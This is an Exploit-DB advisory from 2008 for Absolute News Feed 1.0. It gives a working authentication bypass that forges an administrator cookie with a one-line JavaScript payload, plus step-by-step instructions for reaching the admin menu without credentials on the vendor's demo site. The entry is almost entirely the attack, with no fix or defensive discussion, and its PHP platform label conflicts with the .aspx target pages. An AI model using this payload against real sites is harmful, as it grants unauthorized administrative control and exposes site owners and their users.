Absolute News Feed 1.0 - Remote Insecure Cookie Handling

EDB-ID:

6901


Author:

Hakxer

Type:

webapps


Platform:

PHP

Date:

2008-10-31


########################################################################
# Discovered by : Hakxer                                               #
# Script : Absolute News Feed http://www.xigla.com/absolutenf/demo.htm #
# Greetz : Allah , All My friend ,www.educ-up.com                      #
# -------------------------------                                      #
# Poc :                                                                #
# javascript:document.cookie="xlaAFSuser=p=admin";                     #
#                                                                      #
# [~] Exploit                                                          #
#                                                                      #
# Go To admin login : http://www.xigla.com/absolutenf/demo/login.aspx  #
# Execute JS Code : javascript:document.cookie="xlaAFSuser=p=admin";   #
# Now Go to :http://www.xigla.com/absolutenf/demo/menu.aspx            #
# 								       #
# Absolute Products .. Crashed ( Insecure Cookie Vulnerability )       #
########################################################################

# milw0rm.com [2008-10-31]